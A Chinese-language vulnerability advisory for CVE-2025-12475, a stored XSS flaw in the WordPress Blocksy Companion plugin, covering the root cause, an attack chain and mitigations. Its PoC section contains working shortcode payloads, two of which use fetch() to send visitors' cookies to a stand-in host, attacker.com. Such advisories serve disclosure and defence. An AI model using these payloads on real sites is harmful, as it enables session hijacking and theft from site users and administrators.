CVE-2025-12475: WordPress Blocksy Companion插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12475

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blocksy Companion插件（WordPress）

漏洞概述

CVE-2025-12475是WordPress Blocksy Companion插件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于插件的'blocksy_newsletter_subscribe'短代码功能中，由于对用户提供的属性参数缺乏充分的输入清理和输出转义，导致恶意脚本可以被永久存储在数据库中。攻击者利用此漏洞需要至少具有WordPress contributor级别的用户权限，成功利用后可将任意JavaScript代码注入到页面中。当其他用户访问包含恶意代码的页面时，这些脚本将自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于存储型XSS的特性，恶意脚本会在所有访问受影响页面的用户浏览器中执行，危害范围广泛。该漏洞影响Blocksy Companion插件2.1.14及以下所有版本。

技术细节

该漏洞根源在于Blocksy Companion插件的newsletter-subscribe扩展模块中，对短代码属性参数处理不当。具体来说，'blocksy_newsletter_subscribe'短代码在处理用户输入的attributes时，未能正确实施输入验证和输出编码。攻击者（具有contributor权限）可以在短代码属性中注入恶意JavaScript代码，如：onerror、onload、onclick等事件处理器，或使用<script>标签。由于插件直接将用户输入嵌入到页面HTML中而未进行适当的转义处理，恶意代码会被永久存储在WordPress数据库中。每次页面加载时，浏览器会解析并执行这些存储的脚本。攻击者通常利用此漏洞窃取管理员cookie、修改页面内容进行钓鱼、或进一步提升权限。由于该漏洞属于存储型XSS，无需目标用户点击特定链接，访问页面即可触发攻击，大大增加了漏洞的利用成功率。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用WordPress和Blocksy Companion插件（版本≤2.1.14），确认插件的newsletter-subscribe功能存在

STEP 2

权限获取

攻击者获取WordPress contributor级别或更高权限的账户（可通过社会工程、弱密码或利用其他漏洞获得）

STEP 3

恶意脚本注入

攻击者在支持短代码的页面/文章中插入包含XSS payload的'blocksy_newsletter_subscribe'短代码，如：[blocksy_newsletter_subscribe title='"><script>恶意代码</script>']

STEP 4

数据持久化

由于插件缺乏输入清理，恶意脚本被永久存储在WordPress数据库中，成为页面内容的一部分

STEP 5

触发执行

当普通用户或管理员访问包含恶意短代码的页面时，浏览器解析HTML并执行存储的JavaScript代码

STEP 6

恶意行为实施

攻击者可通过XSS实现会话劫持（窃取cookie）、敏感信息窃取、页面内容篡改或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-12475: Blocksy Companion Stored XSS via blocksy_newsletter_subscribe shortcode -->
<!-- Requires contributor-level WordPress access -->

<!-- Basic XSS PoC using shortcode attribute injection -->
[blocksy_newsletter_subscribe title='"><script>alert(String.fromCharCode(88,83,83,80,111,99,107,101,100))</script>']

<!-- Alternative PoC using event handler -->
[blocksy_newsletter_subscribe title='" onerror="alert(document.cookie)" foo="']

<!-- More sophisticated payload for session hijacking -->
[blocksy_newsletter_subscribe placeholder='"><img src=x onerror=fetch(`https://attacker.com/steal?c=`+document.cookie)>']

<!-- PoC to inject via description field if available -->
[blocksy_newsletter_subscribe description='<script>fetch("https://attacker.com/log?data="+btoa(document.cookie))</script>']

影响范围

Blocksy Companion插件 ≤ 2.1.14（所有版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制或禁用contributor及以上角色的文章发布权限；2）使用WAF（Web应用防火墙）规则拦截包含XSS特征的请求；3）临时禁用blocksy_newsletter_subscribe短代码功能；4）加强用户权限管理，确保所有账户使用强密码和双因素认证；5）定期审查所有文章内容，查找是否存在异常短代码或脚本注入。